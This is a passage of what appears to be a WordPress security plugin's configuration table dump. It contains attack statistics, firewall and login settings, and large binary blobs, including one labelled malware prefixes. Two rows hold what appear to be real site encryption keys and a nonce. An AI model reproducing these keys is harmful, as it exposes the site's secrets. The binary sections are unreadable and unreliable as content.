���ٷ�s�P���W��M�Q�~@�ů�×�͔炿E���$>9�6g\0��È�];��l����\0l�*\r�����\n%�E\'�t��F��䝆��煶\Zf=?��;[���%���j��{j��Ma7�roث���l�]FA�1_������\n���!痰f�WeJS��Z�w�k�X��ڱ��Ӎ��~��\n}�@�=���\\Y��Y�C��]�Ǣ�������5����c�Z����\r��l�Y�ƞ[#�i[��5Жг4\0��2m��&�h`��q\n\"�)\n���Se]��~�&^v���w�Ŝ�����v|چ�`z`����I{�z��C�9��]W���9Ջʸoz=���p�r���7�\0�H\n({�S=g���kyo��?��������8Շ��|B��D����1��3��7�����ţ�遢\n<Yz\'��j�X���`�fr�Q�\Z�ȿ��4��M�F/�-�f��r�:CK\n��8]��PY�5H���gb��:�<�xݢ��X���,s���\Zi�(�6貿!����g�ъ�k8�&��\\��-��38�岟k�n�� ��ϣ�,+��Yy.�2�\rt*q7��,j�_H�d�QPY�@�-�d��x�j��)��dm�x�́��?�9ݱ|��X!�l����%1+�w���$�5�J�ck!ԛ�H�F�fK�\Z������R�$H��ZY��\n~��P.��x꜃ N�î(�gF��FR�\na�*!_^貿�r��`H��a��b��w�@�Y���a_�^��f��^���(�\rO�>�踭,�����������\\q�����r�*����L�lf�����<��w��;�?��ݚ�d �t-��8e�0W��~�*�>< *��0V������\04�~��t���U��gL�Q������磺1Z�ktx��*���5�I鄳~㾥ݐ��n�n\'�-����҉V�>�鈢ڛ�r],?i(R;����}��>����QV!yvpc̒P`��-�e9rJ�K\'t��>;髥�ħgZ�����C����J�o��*^��ɰ1�N�J�R��i�B���O�ӬB��V��h�pC�%��Z�}�=��s<۔��[Z�#g *���\Z�;1\ZE�?Ic�_����c�#ň�M��-�[\"�n�E�*9��p�:�cZT\\��:_���&#`Q�\n. .�E��@�ю.��%E��g���=�N3�>��g�|�S(F�jǕ\n��;�e��X�4P�iev���W�soڋ�L�QBW�b��e�x��A�j�,p�r��k�jV�i����]�A�\"�����3#�q Ɔ�\Z�)+�l\0#<9��\"ϕ���A��v�hz�J>A�q��W�&zU�V����\nW8� ��`�\0ayxHõ�נc��ΏͿͰ��9O�8�^^�]���t*f�%�YE���5�<�`�W��h���j0g�_M����TJ��\np��c[���_:E(.)�&$*~�(gf���;���c��\0̢��c�e�:Hb>R@\'=�v�@5)���y�&�֫����\r���;���&��؛ƿ�ػ�5|V�{��A\rreAFzK`�\"�?��E��z��c�R��z��͞�.V�~!�6��k8������W\'�|ǘ��rf�H /�@\':{�Y�T3NZ�O�Q˶ܩ8�N?5��n�A��.�y��a�餷�#���c���^S��A��_���7�\'hcv��]��#\':�z��K�l��?�Yk���2����W>���-�M��P�N`g?\\\n�\rK����\0��J<ǘ3bxT:�W*���r���-6�f�pxc�,hoN�I��[�\\�`�nB�7�$·#t�\"S�m��-��C�`��Ɋ��s�E#)(���A[�h�\'�����|�kaO�I��h�9A\08(�?�K\n���͠��ZNt�a�Z��f+Ǡ�\n�K������b��n8����1\"P�����&�8�X;�U^������LDL9�4�ݬJ��݃�C�lE<aLj����l�.ēz��]\n��\Z��:��zs\0nĽ���>�e�[7��NJ��tt�@�`�2Z�\'S�V�\"�*�XA�vk�Ox�ޡ�mdFFÅf��a+�6����)rb�4�ʲg��}S�x��vֻ�aʩ�D\05SS�-��*�^Ӆ�\\w����%`0����vl���\r���\n?�4ɿ�r֍�O�n��_4�`�/�-�\'��aYI|6���`Z�4��\n��\"��l\'��U8y�kSl�صA��(GL��8!��<z�Kr�i��ImV�e(iCx��/?���O���E�q���i7A:�3\r�����:�?��2=�,�+)�̻��n�g���3�(���D���a�!_y��� �Q�VGK��҂��sv@��N����\0�}A�v���A��$�=�08Q�j���V\\��P�[�pHa�F~yQ�ˊ������r���`��\Z���9�8Ra>r�Z��!�e%��d�uH/l+��ޠ�����.��I6��(�웎y�R�j�\nM����x\r.s������&�^��5P���n��>��:�����,G�I�z�R�쮝���y���Y#�dz�E ��92���������vnjs,_Y{\Zk��]�ٛz�J�^z���{�M����9l+:A��}0��0��.�@L��3�l囔�\\�Hiܵx�f�Ll#@Ť��e+�=����So\nhѱ�ً!J~ẞ�ǡɹ�Ὑ�g\r��y�uCx��;P{��k����yM��#�h�.���?��t#ɠ���\"���z)`��RI+�_#a�p[o��|\'�:@���A���} E��饬2,��)���w_�DʉԶ�͂���6j4�0F��Sc�\"��~��G8<\'���������:��M�6���/�U�9)�O������WT��>����S��0\0�;��QO�%$K� ���\'��͕{)��_���ĝ�#/q�&�O�[���O�\"²�,���l?2j&�����,�k����$t3��?iYϲYڷO��5]I��{�������ٚ�X�L�l����#,\n�W�Mb��X��zp)\'�F��{��Pniq��9�o��̳l5�y9�Mb�&�iK��ues�<%�qѬ6�I���F�_��\'Q�7�3#5XN��xL+�֖} gTj��,�)0f������;7p>�Dy(�-s\'���#֛X�މ�Ά�>�풏�9�F�ܐ𱐠�d���ְH]@e�Pa�y�ŝ&)ԧ��0�x)/�mۅ�r�Uz�������&���[j�}wR�E����v�����{�A���G�5�F�i �y*dq]�O��X=�ܞ�W[B�\rDݬ����v�p���>��j*���욬�e�3�p�]�L��}�`��`��DX1���ع��WJ���]cƈf� u�J0f�j\0ց�s��ZR�~�]���*����\"�rd��S�2�!�{�֣:=�Nz����g�&��$�F,�lK급/Í9�z�Üu��\Z\"�dm�*\Z���X�[I|�4r�_�xS����*t����^�&��/�\\$����r\\`ʳa���7%��eűCS6���ǀ�h�2.^W�w��H�î4����n�~2p{wq\Z.(�W�a�_N��C���n�d,y�p��U�~���2ʩ��w�:���jU�/��t#L���\"u�t��P�w\"��L�x|�(.ay�ѫu�#\Z�ڄe���u��uI�;o���,1�{��[rѸ5�b�,���B2��+Y�GH�Q�M��p+��i��2�vC����m��*�i���QLC�H8�RvJ��j��o���f2RFt��� {[O��b�4���?���fs^�Y��\0�������^���x�{��N�0Gu�D/�S���ā����;��%�mp2X[�j_aG�����v�@�2��b\\��\0����~*J�jT�\Zw�?/�c�g��)e�����Z~&�q��N7�� Z-�����r��$E�\Z3b\n���NyoH�N�mQ��va�N�/ �Y�!v�46]3�]��3�<���ڗ���<�*=�tpE�KL����[�Mrx%\0�b0qq�Ă��|x����:��_��V�5:�U��S�o2ҾP�u�A_�*}�~��\'K9�;�4��p���\n+=U�O�}��6Ԋ|���}<yﭼ։K�hxޫ(R���1�=~�P�w���ºT�+�In��\r{��M��_�໘`3x���4��L�#\\r��ԹF� \"�$q�c�@\n��C��KnA��O] �`�o���C��K�����.���U8u���i���H<pSh�Zذ/�\r.�O�}9�fP�k���o��2,�=A}P��#\r5�k��,P�D�+�>J��5딧�n���.\0U�Rq�k\'�����i_i,�\n�G��+L�.\rQ�\0��%�\'�y�m�_��#�?���E1\0�² �7��5mw>Z��2Q2K=�^N����q����Q\n�IS�}V#�N7=��ɷ�5���gD��>h]3��\n�0_�э�Wg��1*�V�����FIP���x��f�vL�@���p����R;K�����R��[:[��*w�(�1�� y��jL3ˇ�d�\'��V&}l��]dO��g��V��:���5��fH��A~l!�/�6�yԶ��!��[^�I�ٷO3��E�}{��Y�z������#���@���XaͰ]��()c�k��!~s�~h���q0���X?8�̅���H��i,+x��͵�SE��9�r=�#_~�\\�/Sͻ�(YC/#/�D��^>�6\\����V�6 E�i�*�X,��/�6������}%]�v� ��\ZY����<�}]�8�c��4=}�X�j( ;��w�g�ָ,\\R�0�$k�o�A��{������2#�am��\'��Y#��O��(&\r\n0�{z����7�j����R�v���^0�?�2Dh�4�SG�8RH�e���4ډ3�z\Zr�K,�Iޗ�Oe�x�џ��i}��.��kQ�_�3��9�y\n�b�-5c,R����3���\'�r��.]9c�x��ߚY9�\\~������f���Ƕh�j}u�pIX�p�ھΩT����/�6�F���k�T�E�;�H #�ߛ���{�C\'Vۨ/��H_n{��FW��?^ծ�V��� �N ��-���j���s\Zjh߽C�ș�I��E�R���1��G�Ÿċ��d/8��Z{{�S�*Q�b�U�a����9eR��X�?楐�1���ih\Z�ҕ��X�T�9�����Eߎ�i��ц �v���&�=G���V�kr2��C5����m��~q~���;rfXᅸ��eX�t�Ū.+[�����咩H{v���./s|U�Z��A�h$DU�s����I�{\'\01�������r���k��D����a�c���#k�Qbm(��(��{ia^�\\v�J��M��C�`QA6�_�~�j�c�,1��F\n)7��䩾!�@��� �n���K^$��N�Vj���q��`J�BZ�ޅ�J���X�0u�9�>�!��v1����v��ą�>���Ш�&�D�6X]`��=�s\0��1�y5z���4�O�|p�A5�P���(fy���2��Э�9��ex�kz�B��4��6�Hy�/=��u4�_c��� ο\'���M|4��gE;+\\�)H�q��{�@�dX{a2�H�=���G��6Cm��:�|��!%��p8�Ug��A�N��y�qoʅ#&]�#mV�ە�rȹ���L�=��6m�zQh��Z������C�� ���T�α���i��ߠPom\\D5~�!�������o��a[�ce�U�>T��ø�~3��$:�З���e���W�_6|�T-�>{�rC\n�=���k��Rd�j��6���T������\'����3H�_cx��N���pn��x{V���@��f!��D.S��J/�xk�nZ�~q��6Lꂨ$����?{II%�&���V(Aw��<䩻���c�$�a�=�����!3C�PY��.c%�0b?O�)Mퟴ����[�%>xd�]?Z�1����5���q�)��9W/`��kW�V*�_i_\'h�Ma�CQW�~K�0�X~D�<���>�5�O! U\'���IaӴ9+���6��fF��7�r,��?��O�P��\Z�r�(ga�u;Y�R�>�v\\��?s�k�\\� �~�m���V��|ݐ�\0��!��ٖX6���a�v�/%1U�Ed��_w\'�ޢ���KGs�*<v�u.������S��A`\n� t���p\'��\\ˑ+&�*u4��c \Z{\r�������@l(2�u���-V�����Jˀ��z�ا`*#��j�xZ��&�\Z�{C\rB�]���Y�#�<\0!_�M~(�����k��_�M��W��F�i�]������iˍ��B��l@��j�!�\0@�����Ų�3����pv`�r9H��(�c�WޏK\"�$��G�ϭ\'�6�I�\"�V�ɜ=��0������\Z����h݆֭<e1L�!ӳ��\Z��D�K��i��@*S�ĘRg��� r���z�2,o��Q���ϕ�FU���lt��*�g����V☲ù�����۬��Bj�LN��hZ��e%�D\'��G}w���E�k* ��W،j��|���K\'��l�Ȉ<������fdU�Ƭ����\\�fH���v��I�I��w�d�4\"�醗����0_��h�^1���-�c�j�Htfݬ�?���D)�\'��hcF,�4�|i�Ql�p��t�>�%y����1P�bB��R�����[B}�\n[���; I2q�U�>�n)̈́��Ix��VV$��Z=��q�UO���c����\n���4�\r\'R�2�8�F(>F�2 ����\"Qj6�h��\'�Vh��~��Ad���7��D�c���A�\Z�H�zy�I����Q�]�o��%<��DN�N��M�^�^��/jC9�tb��p�\r<�!!d�e�p��\Z� �0mz�����%�\ZN���:�J0��L��2��\"L��⯜t�%>��:1��W��R����ͩ��Q�i��~�^G�vr�`G�̃�S������$ �2|��>��Y�wM�W[�� ��I��/�H-j\r%�D��������+�P4�g.���{���^W��/![qu����T �&gɖ�\r.��:�)�Q��7�ݣ� �h��\"b�Y(V��W�|/5[�r�ɷ*���M���l���r���n��zW��m:f�O&y(�H������\n�#_F�D:���1I�}U\"\0H�B�&`�8��m��!U�c%rT����.��q�x���=\0���\"�I�8c�_�;�k�6��R�r��E?{d���G_�A���7����c0+��^E��h1��{��9U�,���%k1X�\r Lc�N�;�<K�{�*�k�L������E,�t*�J�. ���*歁\\5��c�%�a��P�T��g�xȻ�=��|@� ԃ��\\��HVq2��v5�o��,�\0�7�IѴ�E�����90.BAe�4>�]y�S�Pk��=�9i��fCu l6E�#�Zt,#<�\ZL�4Z���FU����!}\\֊��_ȕ��o�/B�\\!�Z<&�^�S���V�?���R�Ê�]�� ���ͮ6���R��Ԥz��8�\\4��w��c���y����s���M�)9@����2���.���V�/B��c5a��\rRI�G>?���y;�+�����\'�SAE�D>����qqa�_��؈K)�A��/��YQ��;�#�6�yc�Ȍ�ʗ�j���L�2��-[� 3���]S���.��\\��0ה��B/\n�j�z\'a�����������F�L\Z�H-L `$p1/>:r���V�Ǚ=={��Or�R�xg�J9G0>z�c&�IÆb4~�*L�Q�Rkg!i��f�nb.*��η���$�gw�T��#;?��`�?��;\"��A�Y|���X;u�a�w?oa���bN$��gI���+���R.�e�\Z����pt��ᣈ��:\Z�`\'8�y`���w�W�0���P��R�Ƈ��]�P�d��$*H��9\n?�g{��gs� gO��X�I�#n���!F#Yȼv\"|�:�ݯCG#\nY�E[��V�w��i�%�-%F�\0��[�n�1S�a���+���]��B�E2�s�Ŏ)�?ԟ��B� �*�Z�O��ےn+�z�`ߗ��]�^��$�d�g��Gf���m�G8�@~n��?� x��*Ցx�k��S��략9�����U�R�ݼ\"�EI� {�`z��$��쨀q���Z6hֲC��R=�8H��ΐ��<���>�y��y�=� ���G��ө&����0��*����u�\0u�\r��+M\nMƿ�4��f�_�MG���%2q��0�/ғ:;��e�W�G��ʈ�P��,�K��A]H��%����A��Q�D�۞V蚹xRBBy%�h�Wv��Ƕm�}n�G>p��ѹ��W�����5�w���O�E�̾�m�G��. Ճ�g��?�r�Тjs$_�D&֗��H��s%��v�x-���#����? ���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v��(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;��7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c�� ��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%��!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<����iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[? PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y��}˜.��\Z�^�����*�̶=������.�)~�� �_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*� �&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR���� 𪏨�|�z��03��ܸOV1�SlfwV��1 ��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F !������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s�� b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?�� C�Q���c2 G������e��h��h��^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}���r\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1631615135;s:3:\"tdf\";a:3:{s:9:\"community\";i:4325;s:7:\"premium\";i:4478;s:9:\"blacklist\";i:42438;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1631527200;s:1:\"c\";i:15964879;}i:1;a:2:{s:1:\"t\";i:1631530800;s:1:\"c\";i:15989126;}i:2;a:2:{s:1:\"t\";i:1631534400;s:1:\"c\";i:16092295;}i:3;a:2:{s:1:\"t\";i:1631538000;s:1:\"c\";i:17996167;}i:4;a:2:{s:1:\"t\";i:1631541600;s:1:\"c\";i:18841566;}i:5;a:2:{s:1:\"t\";i:1631545200;s:1:\"c\";i:18246877;}i:6;a:2:{s:1:\"t\";i:1631548800;s:1:\"c\";i:17841551;}i:7;a:2:{s:1:\"t\";i:1631552400;s:1:\"c\";i:17827216;}i:8;a:2:{s:1:\"t\";i:1631556000;s:1:\"c\";i:12392008;}i:9;a:2:{s:1:\"t\";i:1631559600;s:1:\"c\";i:12144978;}i:10;a:2:{s:1:\"t\";i:1631563200;s:1:\"c\";i:12819117;}i:11;a:2:{s:1:\"t\";i:1631566800;s:1:\"c\";i:14128643;}i:12;a:2:{s:1:\"t\";i:1631570400;s:1:\"c\";i:13842256;}i:13;a:2:{s:1:\"t\";i:1631574000;s:1:\"c\";i:13986413;}i:14;a:2:{s:1:\"t\";i:1631577600;s:1:\"c\";i:13751976;}i:15;a:2:{s:1:\"t\";i:1631581200;s:1:\"c\";i:13467941;}i:16;a:2:{s:1:\"t\";i:1631584800;s:1:\"c\";i:13703500;}i:17;a:2:{s:1:\"t\";i:1631588400;s:1:\"c\";i:14406261;}i:18;a:2:{s:1:\"t\";i:1631592000;s:1:\"c\";i:14309796;}i:19;a:2:{s:1:\"t\";i:1631595600;s:1:\"c\";i:13983752;}i:20;a:2:{s:1:\"t\";i:1631599200;s:1:\"c\";i:14140742;}i:21;a:2:{s:1:\"t\";i:1631602800;s:1:\"c\";i:14613914;}i:22;a:2:{s:1:\"t\";i:1631606400;s:1:\"c\";i:18568236;}i:23;a:2:{s:1:\"t\";i:1631610000;s:1:\"c\";i:21454978;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1630972800;s:1:\"c\";i:459159063;}i:1;a:2:{s:1:\"t\";i:1631059200;s:1:\"c\";i:495788228;}i:2;a:2:{s:1:\"t\";i:1631145600;s:1:\"c\";i:433428050;}i:3;a:2:{s:1:\"t\";i:1631232000;s:1:\"c\";i:367494170;}i:4;a:2:{s:1:\"t\";i:1631318400;s:1:\"c\";i:431870547;}i:5;a:2:{s:1:\"t\";i:1631404800;s:1:\"c\";i:429412034;}i:6;a:2:{s:1:\"t\";i:1631491200;s:1:\"c\";i:387519512;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1628985600;s:1:\"c\";i:340948334;}i:1;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391301585;}i:2;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:344009507;}i:3;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:280105303;}i:4;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333953751;}i:5;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408475172;}i:6;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385850530;}i:7;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356787181;}i:8;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:377484738;}i:9;a:2:{s:1:\"t\";i:1629763200;s:1:\"c\";i:417695738;}i:10;a:2:{s:1:\"t\";i:1629849600;s:1:\"c\";i:418090161;}i:11;a:2:{s:1:\"t\";i:1629936000;s:1:\"c\";i:389900851;}i:12;a:2:{s:1:\"t\";i:1630022400;s:1:\"c\";i:408714582;}i:13;a:2:{s:1:\"t\";i:1630108800;s:1:\"c\";i:402826816;}i:14;a:2:{s:1:\"t\";i:1630195200;s:1:\"c\";i:469476833;}i:15;a:2:{s:1:\"t\";i:1630281600;s:1:\"c\";i:545447400;}i:16;a:2:{s:1:\"t\";i:1630368000;s:1:\"c\";i:481856389;}i:17;a:2:{s:1:\"t\";i:1630454400;s:1:\"c\";i:467803517;}i:18;a:2:{s:1:\"t\";i:1630540800;s:1:\"c\";i:380901010;}i:19;a:2:{s:1:\"t\";i:1630627200;s:1:\"c\";i:446598293;}i:20;a:2:{s:1:\"t\";i:1630713600;s:1:\"c\";i:523217908;}i:21;a:2:{s:1:\"t\";i:1630800000;s:1:\"c\";i:405506255;}i:22;a:2:{s:1:\"t\";i:1630886400;s:1:\"c\";i:467677535;}i:23;a:2:{s:1:\"t\";i:1630972800;s:1:\"c\";i:459159063;}i:24;a:2:{s:1:\"t\";i:1631059200;s:1:\"c\";i:495788228;}i:25;a:2:{s:1:\"t\";i:1631145600;s:1:\"c\";i:433428050;}i:26;a:2:{s:1:\"t\";i:1631232000;s:1:\"c\";i:367494170;}i:27;a:2:{s:1:\"t\";i:1631318400;s:1:\"c\";i:431870547;}i:28;a:2:{s:1:\"t\";i:1631404800;s:1:\"c\";i:429412034;}i:29;a:2:{s:1:\"t\";i:1631491200;s:1:\"c\";i:387519512;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1280443676;}i:1;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:379171376;}i:2;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:338573688;}i:3;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:295597297;}i:4;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:230041190;}i:5;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:224700582;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:192365805;}i:7;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:174432674;}i:8;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:158639764;}i:9;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:151231845;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"719041a05c9b2cad42c6f3559d558b8a271bbd4c3571e94d5bb8e8fa106caca5\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1631910060','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:0:{}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','993dff2775848339','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','e5ee69a4db1e318c2a1668873a8f5074012abb9852f5596fe3feaa8c07dac334','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAttackDataSendId','11406','yes'),('lastAttackDataSendTime','1631547773.637953','yes'),('lastBlockAggregation','1631615566','yes'),('lastBruteForceDataSendTime','1631511540.775100','yes'),('lastDailyCron','1631615565','yes'),('lastDashboardCheck','1631615566','yes'),('lastNotificationID','283','no'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1631564497','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','ae6ea11307df7866eaa2463986fdedaf49601203a1fb947505232494ccb474d2','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U� ��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��= ��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�: X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;.v����+�$� i�?�s� �+\n�� ؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs 